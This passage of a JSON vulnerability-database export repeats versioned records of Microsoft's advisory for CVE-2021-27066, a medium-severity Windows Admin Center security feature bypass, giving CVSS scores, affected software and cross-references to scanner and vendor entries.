"3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-11T11:21:01", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T11:21:01", "differentElements": ["msAffectedSoftware"], "edition": 45}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-11T12:51:05", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T12:51:05", "differentElements": ["msAffectedSoftware"], "edition": 46}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-11T15:06:14", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T15:06:14", "differentElements": ["msAffectedSoftware"], "edition": 47}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-11T16:46:44", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T16:46:44", "differentElements": ["msAffectedSoftware"], "edition": 48}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-11T19:03:14", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T19:03:14", "differentElements": ["msAffectedSoftware"], "edition": 49}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-11T20:45:49", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-09T06:49:09", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-09T06:49:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T20:45:49", "differentElements": ["msAffectedSoftware"], "edition": 50}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-11T22:51:32", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-11T22:51:32", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-11T22:51:32", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T22:51:32", "differentElements": ["msAffectedSoftware"], "edition": 51}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "7d75ff58c8e8112121b7aec12131868c", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-12T04:42:28", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-11T22:51:32", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-11T22:51:32", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T04:42:28", "differentElements": ["msAffectedSoftware"], "edition": 52}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-12T06:49:43", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-12T06:49:43", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-12T06:49:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T06:49:43", "differentElements": ["msAffectedSoftware"], "edition": 53}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-12T20:47:44", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-12T06:49:43", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-12T06:49:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T20:47:44", "differentElements": ["msAffectedSoftware"], "edition": 54}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-12T22:45:08", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-12T06:49:43", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-12T06:49:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T22:45:08", "differentElements": ["msAffectedSoftware"], "edition": 55}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-13T00:45:33", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": 